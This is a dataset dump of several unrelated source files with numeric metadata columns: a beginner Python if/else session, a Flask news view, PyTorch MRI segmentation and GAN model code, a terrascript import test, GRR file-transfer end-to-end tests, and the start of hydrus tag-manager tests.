piyushparastiwari/python-project
|
5dba0ef4e77f1d2528f510327de4224b60b1d4ba
|
[
"Apache-2.0"
] | null | null | null |
Python 3.6.5 (v3.6.5:f59c0932b4, Mar 28 2018, 16:07:46) [MSC v.1900 32 bit (Intel)] on win32
Type "copyright", "credits" or "license()" for more information.
>>> x=6
>>> if x%2==0:
print("Even no.")
else:
print("Odd no.")
Even no.
>>> age=30
>>> gender='Male'
>>> sal=60000
>>> if age>30:
elif gender=='Male':
SyntaxError: expected an indented block
>>> if age>30:
if gender=='Male':
if sal>50000:
print("Person is eligible for policy")
else:
print("Not eligible")
Not eligible
>>> marks=80
>>> if marks>=90:
print("A+")
elif marks>=80:
print("A")
elif marks>=70:
print("B")
elif marks>=60:
print("C")
elif marks>=50:
print("D")
elif marks>=40:
print("E")
else:
print("F")
A
>>> year=2016
>>> if year%4==0:
if year%100==0:
print("Leap year")
else:
print("Not leap year")
>>> year
2016
>>> if year%4==0:
print("Leap year")
else:
print("Not leap year")
Leap year
>>> l=10
>>> b=5
>>> if age>25:
if gender=='Male':
if sal>50000:
print("Person is eligible for policy")
else:
print("Not eligible")
Person is eligible for policy
>>> l=10
>>> b=5
>>> if l==b
SyntaxError: invalid syntax
>>> if l==b:
print("It is a square")
else:
print("It is a rectangle")
It is a rectangle
>>> age1=20
>>> age2=10
>>> age3=30
>>> if age1>age2:
if age1>age3:
print("age1 is oldest")
else:
print("age1 is youngest")
if age2>age1:
SyntaxError: invalid syntax
>>> if age1>age2:
if age1>age3:
print("age1 is oldest")
else:
print("age1 is youngest")
if age2>age1:
if age2>age3:
print("age2 is oldest")
else:
print("age2 is younger")
if age3>age1:
print("age3 is oldest")
else:
print("age3 is youngest")
age1 is youngest
>>> if age1>age2 && age1>age3:
SyntaxError: invalid syntax
>>> if age1>age2 and age1>age3:
print("age1 is oldest")
else:
SyntaxError: invalid syntax
>>> if age1>age2 and age1>age3:
print("age1 is oldest")
else:
print("age1 is youngest")
if age2>age1 and age2>age3:
print("age2 is oldest")
else:
print("age2 is younger")
if age3>age1 and age3>age2
print("age3 is oldest")
else:
print("age3 is youngest")
SyntaxError: unindent does not match any outer indentation level
>>> if age1>age2 and age1>age3:
print("age1 is oldest")
else:
print("age1 is youngest")
if age2>age1 and age2>age3:
print("age2 is oldest")
else:
print("age2 is younger")
if age3>age1 and age3>age2
print("age3 is oldest")
else:
print("age3 is youngest")
SyntaxError: unindent does not match any outer indentation level
>>> if age1>age2 and age1>age3:
print("age1 is oldest")
else:
print("age1 is youngest")
if age2>age1 and age2>age3:
print("age2 is oldest")
else:
print("age2 is younger")
if age3>age1 and age3>age2:
print("age3 is oldest")
else:
print("age3 is youngest")
SyntaxError: unindent does not match any outer indentation level
>>> if age1>age2 and age1>age3:
print("age1 is oldest")
else:
print("age1 is youngest")
if age2>age1 and age2>age3:
print("age2 is oldest")
else:
print("age2 is younger")
if age3>age1 and age3>age2:
print("age3 is oldest")
else:
print("age3 is youngest")
SyntaxError: unexpected indent
>>> if age1>age2 and age1>age3:
print("age1 is oldest")
else:
print("age1 is youngest")
if age2>age1 and age2>age3:
print("age2 is oldest")
else:
print("age2 is younger")
if age3>age1 and age3>age2:
print("age3 is oldest")
else:
print("age3 is youngest")
age1 is youngest
age2 is younger
age3 is oldest
>>>
| 19.123711
| 93
| 0.618059
| 567
| 3,710
| 4.044092
| 0.17284
| 0.10205
| 0.104666
| 0.140864
| 0.761884
| 0.744876
| 0.72089
| 0.72089
| 0.72089
| 0.691234
| 0
| 0.081453
| 0.23558
| 3,710
| 193
| 94
| 19.222798
| 0.72708
| 0
| 0
| 0.700599
| 0
| 0
| 0.227182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.347305
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d26647baab13efb4ccb6a4cc5be8f666b6473a68
| 1,181
|
py
|
Python
|
app/main/views.py
|
Nabuuso/News-Catchup
|
ec30f213ec377130f500a4366b6ca30ae68e658f
|
[
"MIT"
] | null | null | null |
app/main/views.py
|
Nabuuso/News-Catchup
|
ec30f213ec377130f500a4366b6ca30ae68e658f
|
[
"MIT"
] | null | null | null |
app/main/views.py
|
Nabuuso/News-Catchup
|
ec30f213ec377130f500a4366b6ca30ae68e658f
|
[
"MIT"
] | null | null | null |
from flask import render_template
from . import main
from ..requests import get_sources
# #@main.route('/')
# def index1():
# '''
# View root page function that returns the index page and its data
# '''
# # Getting popular movie
# business_source = get_sources()
# # print(business_source)
# title = 'Home - Welcome to The best Movie Review Website Online'
# return render_template('index.html',business_sources = business_source)
# #@main.route('/articles/<int:article_id>')
# def articles(article_id):
# '''
# View news page function that returns the news details page and its data
# '''
# return render_template('articles.html',id = article_id)
@main.route('/')
def index():
business_source = get_sources()
# print(business_source)
title = 'Home - Welcome to The best Movie Review Website Online'
return render_template('index.html',business_sources = business_source)
@main.route('/articles/<int:article_id>')
def articles(article_id):
'''
View news page function that returns the news details page and its data
'''
return render_template('articles.html',id = article_id)
| 25.673913
| 77
| 0.679086
| 150
| 1,181
| 5.2
| 0.3
| 0.107692
| 0.102564
| 0.088462
| 0.805128
| 0.771795
| 0.771795
| 0.771795
| 0.771795
| 0.771795
| 0
| 0.001066
| 0.205758
| 1,181
| 45
| 78
| 26.244444
| 0.83049
| 0.564776
| 0
| 0
| 0
| 0
| 0.219409
| 0.054852
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0.272727
| 0
| 0.636364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
d26c97bf9130a2e759ad269e4407c36c387349b9
| 9,786
|
py
|
Python
|
Client_4/model_utils.py
|
karavik18/Federated_Learning_for_Missing_MRI_Sequence
|
42924f8475f354e6b429d05867f99530aa485b96
|
[
"Apache-2.0"
] | 1
|
2021-08-25T13:36:26.000Z
|
2021-08-25T13:36:26.000Z
|
Client_4/model_utils.py
|
karavik18/Federated_Learning_for_Reconstruction_of_Missing_MR_Sequence
|
42924f8475f354e6b429d05867f99530aa485b96
|
[
"Apache-2.0"
] | null | null | null |
Client_4/model_utils.py
|
karavik18/Federated_Learning_for_Reconstruction_of_Missing_MR_Sequence
|
42924f8475f354e6b429d05867f99530aa485b96
|
[
"Apache-2.0"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import models
class PreNet(nn.Module):
def __init__(self):
super(PreNet,self).__init__()
self.conv1 = nn.Conv2d(4, 8, 3, padding = 1)
self.act1 = nn.LeakyReLU(0.2, inplace=False)
self.conv2 = nn.Conv2d(8, 16, 3, padding = 1)
self.act2 = nn.LeakyReLU(0.2, inplace=False)
def forward(self, labels):
conv1 = self.act1(self.conv1(labels))
conv2 = self.act2(self.conv2(conv1))
return conv2
class SUMNet_v1(nn.Module):
def __init__(self):
super(SUMNet, self).__init__()
self.conv1 = nn.Conv2d(4, 64, 3, padding=(1,1))
self.bn1 = nn.BatchNorm2d(64)
self.pool1 = nn.MaxPool2d(2, 2, return_indices = False)
self.conv2 = nn.Conv2d(64, 128, 3, padding=(1,1))
self.bn2 = nn.BatchNorm2d(128)
self.pool2 = nn.MaxPool2d(2, 2, return_indices = False)
self.conv3a = nn.Conv2d(128, 256, 3, padding=(1,1))
self.bn3 = nn.BatchNorm2d(256)
self.conv3b = nn.Conv2d(256, 256, 3, padding=(1,1))
self.bn4 = nn.BatchNorm2d(256)
self.pool3 = nn.MaxPool2d(2, 2, return_indices = False)
self.conv4a = nn.Conv2d(256, 512, 3, padding=(1,1))
self.bn5 = nn.BatchNorm2d(512)
self.conv4b = nn.Conv2d(512, 512, 3, padding=(1,1))
self.bn6 = nn.BatchNorm2d(512)
self.pool4 = nn.MaxPool2d(2, 2, return_indices = False)
self.conv5a = nn.Conv2d(512, 512, 3, padding=(1,1))
self.bn7 = nn.BatchNorm2d(512)
self.conv5b = nn.Conv2d(512, 512, 3, padding=(1,1))
self.bn8 = nn.BatchNorm2d(512)
self.pool5 = nn.MaxPool2d(2, 2, return_indices = False)
self.unpool5 = nn.MaxUnpool2d(2, 2)
self.donv5b = nn.Conv2d(1024, 512, 3, padding = 1)
self.donv5a = nn.Conv2d(512, 512, 3, padding = 1)
self.unpool4 = nn.MaxUnpool2d(2, 2)
self.donv4b = nn.Conv2d(1024, 512, 3, padding = 1)
self.donv4a = nn.Conv2d(512, 256, 3, padding = 1)
self.unpool3 = nn.MaxUnpool2d(2, 2)
self.donv3b = nn.Conv2d(512, 256, 3, padding = 1)
self.donv3a = nn.Conv2d(256,128, 3, padding = 1)
self.unpool2 = nn.MaxUnpool2d(2, 2)
self.donv2 = nn.Conv2d(256, 64, 3, padding = 1)
self.unpool1 = nn.MaxUnpool2d(2, 2)
self.donv1 = nn.Conv2d(128, 32, 3, padding = 1)
self.output = nn.Conv2d(32, 4, 1)
def forward(self, x):
conv1 = F.relu(self.bn1(self.conv1(x)), inplace = True)
pool1, idxs1 = self.pool1(conv1)
conv2 = F.relu(self.bn2(self.conv2(pool1)), inplace = True)
pool2, idxs2 = self.pool2(conv2)
conv3a = F.relu(self.bn3(self.conv3a(pool2)), inplace = True)
conv3b = F.relu(self.bn4(self.conv3b(conv3a)), inplace = True)
pool3, idxs3 = self.pool3(conv3b)
conv4a = F.relu(self.bn5(self.conv4a(pool3)), inplace = True)
conv4b = F.relu(self.bn6(self.conv4b(conv4a)), inplace = True)
pool4, idxs4 = self.pool4(conv4b)
conv5a = F.relu(self.bn7(self.conv5a(pool4)), inplace = True)
conv5b = F.relu(self.bn8(self.conv5b(conv5a)), inplace = True)
pool5, idxs5 = self.pool5(conv5b)
unpool5 = torch.cat([self.unpool5(pool5, idxs5), conv5b], 1)
donv5b = F.relu(self.donv5b(unpool5), inplace = True)
donv5a = F.relu(self.donv5a(donv5b), inplace = True)
unpool4 = torch.cat([self.unpool4(donv5a, idxs4), conv4b], 1)
donv4b = F.relu(self.donv4b(unpool4), inplace = True)
donv4a = F.relu(self.donv4a(donv4b), inplace = True)
unpool3 = torch.cat([self.unpool3(donv4a, idxs3), conv3b], 1)
donv3b = F.relu(self.donv3b(unpool3), inplace = True)
donv3a = F.relu(self.donv3a(donv3b))
unpool2 = torch.cat([self.unpool2(donv3a, idxs2), conv2], 1)
donv2 = F.relu(self.donv2(unpool2), inplace = True)
unpool1 = torch.cat([self.unpool1(donv2, idxs1), conv1], 1)
donv1 = F.relu(self.donv1(unpool1), inplace = True)
output = self.output(donv1)
return torch.sigmoid(output)
class SUMNet(nn.Module):
def __init__(self):
super(SUMNet, self).__init__()
self.conv1 = nn.Conv2d(16, 64, 3, padding=(1,1))
self.bn1 = nn.BatchNorm2d(64)
self.pool1 = nn.MaxPool2d(2, 2, return_indices = False)
self.conv2 = nn.Conv2d(64, 128, 3, padding=(1,1))
self.bn2 = nn.BatchNorm2d(128)
self.pool2 = nn.MaxPool2d(2, 2, return_indices = False)
self.conv3a = nn.Conv2d(128, 256, 3, padding=(1,1))
self.bn3 = nn.BatchNorm2d(256)
self.conv3b = nn.Conv2d(256, 256, 3, padding=(1,1))
self.bn4 = nn.BatchNorm2d(256)
self.pool3 = nn.MaxPool2d(2, 2, return_indices = False)
self.conv4a = nn.Conv2d(256, 512, 3, padding=(1,1))
self.bn5 = nn.BatchNorm2d(512)
self.conv4b = nn.Conv2d(512, 512, 3, padding=(1,1))
self.bn6 = nn.BatchNorm2d(512)
self.pool4 = nn.MaxPool2d(2, 2, return_indices = False)
self.conv5a = nn.Conv2d(512, 512, 3, padding=(1,1))
self.bn7 = nn.BatchNorm2d(512)
self.conv5b = nn.Conv2d(512, 512, 3, padding=(1,1))
self.bn8 = nn.BatchNorm2d(512)
self.pool5 = nn.MaxPool2d(2, 2, return_indices = False)
self.unpool5 = nn.MaxUnpool2d(2, 2)
self.donv5b = nn.Conv2d(1024, 512, 3, padding = 1)
self.donv5a = nn.Conv2d(512, 512, 3, padding = 1)
self.unpool4 = nn.MaxUnpool2d(2, 2)
self.donv4b = nn.Conv2d(1024, 512, 3, padding = 1)
self.donv4a = nn.Conv2d(512, 256, 3, padding = 1)
self.unpool3 = nn.MaxUnpool2d(2, 2)
self.donv3b = nn.Conv2d(512, 256, 3, padding = 1)
self.donv3a = nn.Conv2d(256,128, 3, padding = 1)
self.unpool2 = nn.MaxUnpool2d(2, 2)
self.donv2 = nn.Conv2d(256, 64, 3, padding = 1)
self.unpool1 = nn.MaxUnpool2d(2, 2)
self.donv1 = nn.Conv2d(128, 32, 3, padding = 1)
self.output = nn.Conv2d(32, 4, 1)
def forward(self, x):
conv1 = F.relu(self.bn1(self.conv1(x)), inplace = True)
pool1, idxs1 = self.pool1(conv1)
conv2 = F.relu(self.bn2(self.conv2(pool1)), inplace = True)
pool2, idxs2 = self.pool2(conv2)
conv3a = F.relu(self.bn3(self.conv3a(pool2)), inplace = True)
conv3b = F.relu(self.bn4(self.conv3b(conv3a)), inplace = True)
pool3, idxs3 = self.pool3(conv3b)
conv4a = F.relu(self.bn5(self.conv4a(pool3)), inplace = True)
conv4b = F.relu(self.bn6(self.conv4b(conv4a)), inplace = True)
pool4, idxs4 = self.pool4(conv4b)
conv5a = F.relu(self.bn7(self.conv5a(pool4)), inplace = True)
conv5b = F.relu(self.bn8(self.conv5b(conv5a)), inplace = True)
pool5, idxs5 = self.pool5(conv5b)
unpool5 = torch.cat([self.unpool5(pool5, idxs5), conv5b], 1)
donv5b = F.relu(self.donv5b(unpool5), inplace = True)
donv5a = F.relu(self.donv5a(donv5b), inplace = True)
unpool4 = torch.cat([self.unpool4(donv5a, idxs4), conv4b], 1)
donv4b = F.relu(self.donv4b(unpool4), inplace = True)
donv4a = F.relu(self.donv4a(donv4b), inplace = True)
unpool3 = torch.cat([self.unpool3(donv4a, idxs3), conv3b], 1)
donv3b = F.relu(self.donv3b(unpool3), inplace = True)
donv3a = F.relu(self.donv3a(donv3b))
unpool2 = torch.cat([self.unpool2(donv3a, idxs2), conv2], 1)
donv2 = F.relu(self.donv2(unpool2), inplace = True)
unpool1 = torch.cat([self.unpool1(donv2, idxs1), conv1], 1)
donv1 = F.relu(self.donv1(unpool1), inplace = True)
output = self.output(donv1)
return torch.sigmoid(output)
class Discriminator(nn.Module):
def __init__(self):
super(Discriminator,self).__init__()
self.conv1 = nn.Conv2d(2, 16, 4, 2, 1, bias=False)
self.act1 = nn.LeakyReLU(0.2, inplace=False)
self.conv2 = nn.Conv2d(16, 32, 4, 2, 1, bias=False)
self.act2 = nn.LeakyReLU(0.2, inplace=False)
self.conv3 = nn.Conv2d(32, 64, 4, 2, 1, bias=False)
self.act3 = nn.LeakyReLU(0.2, inplace=False)
self.conv4 = nn.Conv2d(64, 128, 4, 2, 1, bias=False)
self.act4 = nn.LeakyReLU(0.2, inplace=False)
self.conv5 = nn.Conv2d(128, 128, 4, 2, 1, bias=False)
self.act5 = nn.LeakyReLU(0.2, inplace=False)
self.conv6 = nn.Conv2d(128, 128, 4,2,1, bias=False)
self.act6 = nn.LeakyReLU(0.2, inplace=False)
self.conv7 = nn.Conv2d(128, 2, 3, 1, bias=False)
self.pool7 = nn.MaxPool2d(2,stride=2)
def forward(self, labels):
conv1 = self.act1(self.conv1(labels))
conv2 = self.act2(self.conv2(conv1))
conv3 = self.act3(self.conv3(conv2))
conv4 = self.act4(self.conv4(conv3))
conv5 = self.act5(self.conv5(conv4))
conv6 = self.act6(self.conv6(conv5))
conv7 = self.conv7(conv6)
pool7 = self.pool7(conv7)
return torch.sigmoid(pool7)
| 51.505263
| 78
| 0.557531
| 1,293
| 9,786
| 4.186388
| 0.07966
| 0.063551
| 0.056531
| 0.043229
| 0.913541
| 0.913541
| 0.892666
| 0.861999
| 0.849806
| 0.849806
| 0
| 0.124909
| 0.300531
| 9,786
| 189
| 79
| 51.777778
| 0.665888
| 0
| 0
| 0.806818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.022727
| 0
| 0.113636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9641bf1f38b0a6af53ba536dc84fa8c30eb6a0cc
| 732
|
py
|
Python
|
tests/test_provider_cloudknox_cloudknox.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
tests/test_provider_cloudknox_cloudknox.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
tests/test_provider_cloudknox_cloudknox.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# tests/test_provider_cloudknox_cloudknox.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:14:14 UTC)
def test_provider_import():
import terrascript.provider.cloudknox.cloudknox
def test_datasource_import():
from terrascript.data.cloudknox.cloudknox import cloudknox_role_policy
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.cloudknox.cloudknox
#
# t = terrascript.provider.cloudknox.cloudknox.cloudknox()
# s = str(t)
#
# assert 'https://github.com/cloudknox/terraform-provider-cloudknox' in s
# assert '0.6.0' in s
| 29.28
| 80
| 0.756831
| 96
| 732
| 5.645833
| 0.583333
| 0.199262
| 0.191882
| 0.204797
| 0.158672
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024077
| 0.148907
| 732
| 24
| 81
| 30.5
| 0.845907
| 0.70082
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.041667
| 0
| 1
| 0.5
| true
| 0
| 1
| 0
| 1.5
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9658dbb05f5a461f21df7919c3a62bc3162b3133
| 3,524
|
py
|
Python
|
grr/test/grr_response_test/end_to_end_tests/tests/transfer.py
|
tsehori/grr
|
048506f22f74642bfe61749069a45ddf496fdab3
|
[
"Apache-2.0"
] | 1
|
2021-07-24T17:22:50.000Z
|
2021-07-24T17:22:50.000Z
|
grr/test/grr_response_test/end_to_end_tests/tests/transfer.py
|
tsehori/grr
|
048506f22f74642bfe61749069a45ddf496fdab3
|
[
"Apache-2.0"
] | 44
|
2021-05-14T22:49:24.000Z
|
2022-03-13T21:54:02.000Z
|
grr/test/grr_response_test/end_to_end_tests/tests/transfer.py
|
tsehori/grr
|
048506f22f74642bfe61749069a45ddf496fdab3
|
[
"Apache-2.0"
] | 2
|
2022-02-25T08:34:51.000Z
|
2022-03-16T17:29:44.000Z
|
#!/usr/bin/env python
"""End to end tests for transfer flows."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from grr_response_test.end_to_end_tests import test_base
class TestTransferLinux(test_base.AbstractFileTransferTest):
"""Test GetFile on Linux."""
platforms = [test_base.EndToEndTest.Platform.LINUX]
def testGetFileOS(self):
args = self.grr_api.types.CreateFlowArgs("GetFile")
args.pathspec.path = "/bin/ls"
args.pathspec.pathtype = args.pathspec.OS
path = "fs/os/bin/ls"
with self.WaitForFileCollection(path):
self.RunFlowAndWait("GetFile", args=args)
self.CheckELFMagic(path)
def testGetFileTSK(self):
if self.os_release == "CentOS Linux":
self.skipTest(
"TSK is not supported on CentOS due to an xfs root filesystem.")
args = self.grr_api.types.CreateFlowArgs("GetFile")
args.pathspec.path = "/usr/bin/diff"
args.pathspec.pathtype = args.pathspec.TSK
f = self.RunFlowAndWait("GetFile", args=args)
results = list(f.ListResults())
self.assertNotEmpty(results)
stat_entry = results[0].payload
path = self.TSKPathspecToVFSPath(stat_entry.pathspec)
# Run GetFile again to make sure the path gets updated.
with self.WaitForFileRefresh(path):
self.RunFlowAndWait("GetFile", args=args)
self.CheckELFMagic(path)
class TestTransferDarwin(test_base.AbstractFileTransferTest):
"""Test GetFile on Darwin."""
platforms = [test_base.EndToEndTest.Platform.DARWIN]
def testGetFileOS(self):
args = self.grr_api.types.CreateFlowArgs("GetFile")
args.pathspec.path = "/bin/ls"
args.pathspec.pathtype = args.pathspec.OS
path = "fs/os/bin/ls"
with self.WaitForFileCollection(path):
self.RunFlowAndWait("GetFile", args=args)
self.CheckMacMagic(path)
class TestTransferWindows(test_base.AbstractFileTransferTest):
"""Test GetFile on Windows."""
platforms = [test_base.EndToEndTest.Platform.WINDOWS]
def testGetFileOS(self):
args = self.grr_api.types.CreateFlowArgs("GetFile")
args.pathspec.path = "C:\\Windows\\regedit.exe"
args.pathspec.pathtype = args.pathspec.OS
path = "fs/os/C:/Windows/regedit.exe"
with self.WaitForFileCollection(path):
self.RunFlowAndWait("GetFile", args=args)
self.CheckPEMagic(path)
def testGetFileTSK(self):
args = self.grr_api.types.CreateFlowArgs("GetFile")
args.pathspec.path = "C:\\Windows\\regedit.exe"
args.pathspec.pathtype = args.pathspec.TSK
f = self.RunFlowAndWait("GetFile", args=args)
results = list(f.ListResults())
self.assertNotEmpty(results)
stat_entry = results[0].payload
path = self.TSKPathspecToVFSPath(stat_entry.pathspec)
# Run GetFile again to make sure the path gets updated.
with self.WaitForFileRefresh(path):
self.RunFlowAndWait("GetFile", args=args)
self.CheckPEMagic(path)
def testGetFileNTFS(self):
args = self.grr_api.types.CreateFlowArgs("GetFile")
args.pathspec.path = "C:\\Windows\\regedit.exe"
args.pathspec.pathtype = args.pathspec.NTFS
f = self.RunFlowAndWait("GetFile", args=args)
results = list(f.ListResults())
self.assertNotEmpty(results)
stat_entry = results[0].payload
path = self.NTFSPathspecToVFSPath(stat_entry.pathspec)
# Run GetFile again to make sure the path gets updated.
with self.WaitForFileRefresh(path):
self.RunFlowAndWait("GetFile", args=args)
self.CheckPEMagic(path)
| 30.119658
| 74
| 0.720488
| 425
| 3,524
| 5.882353
| 0.216471
| 0.0864
| 0.09
| 0.1044
| 0.8052
| 0.7608
| 0.7068
| 0.7068
| 0.7068
| 0.6892
| 0
| 0.001015
| 0.161464
| 3,524
| 116
| 75
| 30.37931
| 0.845008
| 0.082577
| 0
| 0.739726
| 0
| 0
| 0.102524
| 0.031162
| 0
| 0
| 0
| 0
| 0.041096
| 1
| 0.082192
| false
| 0
| 0.054795
| 0
| 0.219178
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
96627edf5185a45caf15d2e0b3c082b3399168fb
| 136,559
|
py
|
Python
|
hydrus/test/TestClientTags.py
|
Asday/hydrus
|
a09ab839633661f446612a92b680bb8118a46b39
|
[
"WTFPL"
] | null | null | null |
hydrus/test/TestClientTags.py
|
Asday/hydrus
|
a09ab839633661f446612a92b680bb8118a46b39
|
[
"WTFPL"
] | null | null | null |
hydrus/test/TestClientTags.py
|
Asday/hydrus
|
a09ab839633661f446612a92b680bb8118a46b39
|
[
"WTFPL"
] | null | null | null |
import collections
import unittest
from hydrus.core import HydrusConstants as HC
from hydrus.core import HydrusData
from hydrus.core import HydrusGlobals as HG
from hydrus.core import HydrusTags
from hydrus.core import HydrusText
from hydrus.external import SystemPredicateParser
from hydrus.client import ClientConstants as CC
from hydrus.client import ClientManagers
from hydrus.client import ClientSearch
from hydrus.client import ClientSearchParseSystemPredicates
from hydrus.client.media import ClientMediaManagers
from hydrus.client.metadata import ClientTags
from hydrus.client.metadata import ClientTagsHandling
class TestMergeTagsManagers( unittest.TestCase ):
def test_merge( self ):
first = HydrusData.GenerateKey()
second = HydrusData.GenerateKey()
third = HydrusData.GenerateKey()
#
service_keys_to_statuses_to_tags = collections.defaultdict( HydrusData.default_dict_set )
service_keys_to_statuses_to_tags[ first ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_1', 'series:blame!' }
service_keys_to_statuses_to_tags[ second ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_duplicate_1', 'character:cibo' }
service_keys_to_statuses_to_tags[ second ][ HC.CONTENT_STATUS_DELETED ] = { 'current_1' }
service_keys_to_statuses_to_tags[ second ][ HC.CONTENT_STATUS_PENDING ] = { 'pending_1', 'creator:tsutomu nihei' }
service_keys_to_statuses_to_tags[ second ][ HC.CONTENT_STATUS_PETITIONED ] = { 'petitioned_1' }
service_keys_to_statuses_to_tags[ third ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_duplicate', 'current_duplicate_1' }
service_keys_to_statuses_to_tags[ third ][ HC.CONTENT_STATUS_PENDING ] = { 'volume:3' }
service_keys_to_statuses_to_display_tags = collections.defaultdict( HydrusData.default_dict_set )
service_keys_to_statuses_to_display_tags[ first ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_1', 'series:blame!' }
service_keys_to_statuses_to_display_tags[ second ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_duplicate_1', 'character:cibo' }
service_keys_to_statuses_to_display_tags[ second ][ HC.CONTENT_STATUS_PENDING ] = { 'pending_1', 'creator:tsutomu nihei' }
service_keys_to_statuses_to_display_tags[ third ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_duplicate', 'current_duplicate_1' }
service_keys_to_statuses_to_display_tags[ third ][ HC.CONTENT_STATUS_PENDING ] = { 'volume:3' }
tags_manager_1 = ClientMediaManagers.TagsManager( service_keys_to_statuses_to_tags, service_keys_to_statuses_to_display_tags )
#
service_keys_to_statuses_to_tags = collections.defaultdict( HydrusData.default_dict_set )
service_keys_to_statuses_to_tags[ first ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_2', 'series:blame!', 'chapter:1' }
service_keys_to_statuses_to_tags[ first ][ HC.CONTENT_STATUS_DELETED ] = { 'deleted_2' }
service_keys_to_statuses_to_tags[ second ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_duplicate' }
service_keys_to_statuses_to_tags[ second ][ HC.CONTENT_STATUS_PENDING ] = { 'architecture', 'chapter:2' }
service_keys_to_statuses_to_tags[ third ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_duplicate' }
service_keys_to_statuses_to_display_tags = collections.defaultdict( HydrusData.default_dict_set )
service_keys_to_statuses_to_display_tags[ first ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_2', 'series:blame!', 'chapter:1' }
service_keys_to_statuses_to_display_tags[ first ][ HC.CONTENT_STATUS_DELETED ] = { 'deleted_2' }
service_keys_to_statuses_to_display_tags[ second ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_duplicate' }
service_keys_to_statuses_to_display_tags[ second ][ HC.CONTENT_STATUS_PENDING ] = { 'architecture', 'chapter:2' }
service_keys_to_statuses_to_display_tags[ third ][ HC.CONTENT_STATUS_CURRENT ] = { 'current_duplicate' }
tags_manager_2 = ClientMediaManagers.TagsManager( service_keys_to_statuses_to_tags, service_keys_to_statuses_to_display_tags )
#
service_keys_to_statuses_to_tags = collections.defaultdict( HydrusData.default_dict_set )
service_keys_to_statuses_to_tags[ second ][ HC.CONTENT_STATUS_CURRENT ] = { 'page:4', 'page:5' }
service_keys_to_statuses_to_tags[ second ][ HC.CONTENT_STATUS_PENDING ] = { 'title:double page spread' }
service_keys_to_statuses_to_display_tags = collections.defaultdict( HydrusData.default_dict_set )
service_keys_to_statuses_to_display_tags[ second ][ HC.CONTENT_STATUS_CURRENT ] = { 'page:4', 'page:5' }
service_keys_to_statuses_to_display_tags[ second ][ HC.CONTENT_STATUS_PENDING ] = { 'title:double page spread' }
tags_manager_3 = ClientMediaManagers.TagsManager( service_keys_to_statuses_to_tags, service_keys_to_statuses_to_display_tags )
#
tags_managers = ( tags_manager_1, tags_manager_2, tags_manager_3 )
tags_manager = ClientMediaManagers.TagsManager.MergeTagsManagers( tags_managers )
#
self.assertEqual( tags_manager.GetNamespaceSlice( ( 'character', ), ClientTags.TAG_DISPLAY_ACTUAL ), frozenset( { 'character:cibo' } ) )
class TestTagsManager( unittest.TestCase ):
@classmethod
def setUpClass( cls ):
cls._first_key = HydrusData.GenerateKey()
cls._second_key = HydrusData.GenerateKey()
cls._third_key = HydrusData.GenerateKey()
service_keys_to_statuses_to_tags = collections.defaultdict( HydrusData.default_dict_set )
